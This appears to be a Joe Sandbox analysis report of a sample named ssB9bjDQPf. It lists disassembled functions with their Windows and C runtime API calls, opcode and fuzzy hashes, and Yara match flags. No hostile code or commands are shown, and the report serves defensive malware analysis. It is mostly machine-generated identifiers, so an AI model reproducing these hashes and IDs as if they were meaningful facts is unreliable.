                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                    • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                    • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                    Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                    • SafeRWList.LIBCONCRT ref: 00419798
                                                      • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                      • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                    • GetLastError.KERNEL32 ref: 004197B9
                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                    • String ID: eventObject
                                                    • API String ID: 1999291547-1680012138
                                                    • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                    • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                    • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                    • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                    Function 02510C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 02510C36
                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02510C9D
                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02510CBA
                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02510D20
                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02510D35
                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02510D47
                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02510D75
                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02510D80
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02510DAC
                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02510DBC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                    • String ID:
                                                    • API String ID: 3720063390-0
                                                    • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                    • Instruction ID: e8e89560666b177eca3f8910d5d6642cf17a0d781d68145044ade4c5fe9def99
                                                    • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                    • Instruction Fuzzy Hash: 5441D330A042499BEF14FFA4C8947BD7BA2BF81308F1440AAD9055B2C2CF759A45CF6A
                                                    Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00431DFA
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 00431E06
                                                    • _free.LIBCMT ref: 00431E11
                                                    • _free.LIBCMT ref: 00431E1C
                                                    • _free.LIBCMT ref: 00431E27
                                                    • _free.LIBCMT ref: 00431E32
                                                    • _free.LIBCMT ref: 00431E3D
                                                    • _free.LIBCMT ref: 00431E48
                                                    • _free.LIBCMT ref: 00431E53
                                                    • _free.LIBCMT ref: 00431E61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                    Function 0252204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 02522061
                                                      • Part of subcall function 025236D1: HeapFree.KERNEL32(00000000,00000000,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?), ref: 025236E7
                                                      • Part of subcall function 025236D1: GetLastError.KERNEL32(?,?,0252A35F,?,00000000,?,00000000,?,0252A603,?,00000007,?,?,0252A9F7,?,?), ref: 025236F9
                                                    • _free.LIBCMT ref: 0252206D
                                                    • _free.LIBCMT ref: 02522078
                                                    • _free.LIBCMT ref: 02522083
                                                    • _free.LIBCMT ref: 0252208E
                                                    • _free.LIBCMT ref: 02522099
                                                    • _free.LIBCMT ref: 025220A4
                                                    • _free.LIBCMT ref: 025220AF
                                                    • _free.LIBCMT ref: 025220BA
                                                    • _free.LIBCMT ref: 025220C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction ID: 61115e92762f8909a94688a17a4bd7bfc5cc7cbb3a00f193923536d4be60acf5
                                                    • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                    • Instruction Fuzzy Hash: 7F11A47620012DBFCB41EF54C841CD93BAAFF49350B0180A1BA088F2A1DB75EE659F84
                                                    Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __cftoe
                                                    • String ID: F(@$F(@
                                                    • API String ID: 4189289331-2038261262
                                                    • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                    • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                    • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                    • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                    Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer
                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-3064271455
                                                    • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                    • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                    • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                    • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                    Function 02523190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                    • Instruction ID: b9a4e3fec19be10499350421c4e009bec54d613f88aae83d4994120e77c27916
                                                    • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                    • Instruction Fuzzy Hash: F5C1E170E04269BBDB12DFA8C845BADBFB5BF4A300F1440D9E814A72D1C7389949CB69
                                                    Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                    • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                    • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: fB$csm
                                                    • API String ID: 1170836740-1586063737
                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                    • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                    • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                    Function 00428CBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                    • PMDtoOffset.LIBCMT ref: 00428D4F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: FindInstanceTargetType$Offset
                                                    • String ID: Bad dynamic_cast!
                                                    • API String ID: 1467055271-2956939130
                                                    • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                    • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                    • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                    • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                    Function 0250C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • atomic_compare_exchange.LIBCONCRT ref: 0250C6DC
                                                    • atomic_compare_exchange.LIBCONCRT ref: 0250C700
                                                    • std::_Cnd_initX.LIBCPMT ref: 0250C711
                                                    • std::_Cnd_initX.LIBCPMT ref: 0250C71F
                                                      • Part of subcall function 024F1370: __Mtx_unlock.LIBCPMT ref: 024F1377
                                                    • std::_Cnd_initX.LIBCPMT ref: 0250C72F
                                                      • Part of subcall function 0250C3EF: __Cnd_broadcast.LIBCPMT ref: 0250C3F6
                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0250C73D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                    • String ID: t#D
                                                    • API String ID: 4258476935-1671555958
                                                    • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                    • Instruction ID: 82360d77de39f7e51c8f28072430f814042289f57c294f89d7d5000563fb7ed1
                                                    • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                    • Instruction Fuzzy Hash: 77012B71900606A7DB11F7B1CDC4B9DB75ABF81310F140116E905972C0DBB4EB158F9A
                                                    Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                    • __alloca_probe_16.LIBCMT ref: 004321C6
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                    • __alloca_probe_16.LIBCMT ref: 004322AB
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                    • __freea.LIBCMT ref: 0043231B
                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    • __freea.LIBCMT ref: 00432324
                                                    • __freea.LIBCMT ref: 00432349
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 3864826663-0
                                                    • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                    • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                    • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                    • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                    Function 02521129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • _free.LIBCMT ref: 02521444
                                                    • _free.LIBCMT ref: 0252145D
                                                    • _free.LIBCMT ref: 0252148F
                                                    • _free.LIBCMT ref: 02521498
                                                    • _free.LIBCMT ref: 025214A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorLast
                                                    • String ID: C
                                                    • API String ID: 3291180501-1037565863
                                                    • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                    • Instruction ID: 4e469bf6d216eaa324051c1a723ff7cc4d0356b6b0ca0e2996657967172e603f
                                                    • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                    • Instruction Fuzzy Hash: 60B13A75A0162A9FDB24DF18C884BAEB7B5FB49304F1085AAD80DA73D1D731AE94CF44
                                                    Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                    • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                    • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                    • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                    Function 0252A115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                    • Instruction ID: 886571dbd201764ba8f6b09778865a0afafbde1a67478c5353b6a5d4f9c1f6bf
                                                    • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                    • Instruction Fuzzy Hash: 8361C471900226AFDB20CF64C841B9ABBF5FF4A710F2441AAE944EB3C1D771A945CB58
                                                    Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                    • __fassign.LIBCMT ref: 00433940
                                                    • __fassign.LIBCMT ref: 0043395B
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                    • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                    • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                    • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                    • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                    • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                    Function 02523AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(?,0251C4A4,E0830C40,?,?,?,?,?,?,0252425F,024FE03C,0251C4A4,?,0251C4A4,0251C4A4,024FE03C), ref: 02523B2C
                                                    • __fassign.LIBCMT ref: 02523BA7
                                                    • __fassign.LIBCMT ref: 02523BC2
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0251C4A4,00000001,?,00000005,00000000,00000000), ref: 02523BE8
                                                    • WriteFile.KERNEL32(?,?,00000000,0252425F,00000000,?,?,?,?,?,?,?,?,?,0252425F,024FE03C), ref: 02523C07
                                                    • WriteFile.KERNEL32(?,024FE03C,00000001,0252425F,00000000,?,?,?,?,?,?,?,?,?,0252425F,024FE03C), ref: 02523C40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                    • Instruction ID: b839de7c2d0f814ebbfd9556e6dd859db968c6c819a15f1703ee20cab7ffefd9
                                                    • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                    • Instruction Fuzzy Hash: D651C474900219AFCB10CFA8D885AEEBBF4FF0A704F14416AE555F72D1E7349A85CB68
                                                    Function 02514AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02514ACD
                                                      • Part of subcall function 02514D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02514800), ref: 02514DAC
                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02514AE2
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02514AF1
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02514AFF
                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02514B75
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02514BB5
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02514BC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                    • String ID:
                                                    • API String ID: 3151764488-0
                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                    • Instruction ID: 195b7399ff24851bd83ac62a9574fd68950099d0c3efda0829d0318a017887e9
                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                    • Instruction Fuzzy Hash: 54310D39A002159BDF04EF68C885F6D77BAFF84320F214565DD15AB281DB70DE05CB98
                                                    Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                    • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                    • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                    • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                    Function 0252FBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                    • Instruction ID: 80299bbd75ce0380b7428be8cc8b728139dcbea8c7ac5d7445cf5d468c5a0242
                                                    • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                    • Instruction Fuzzy Hash: C311B472509126BBEB212F76DC4896B7E6DFFC3B31B100A25FC15E71C0DA348805CAA8
                                                    Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                    • _free.LIBCMT ref: 0043A3D1
                                                      • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                    • _free.LIBCMT ref: 0043A3DC
                                                    • _free.LIBCMT ref: 0043A3E7
                                                    • _free.LIBCMT ref: 0043A43B
                                                    • _free.LIBCMT ref: 0043A446
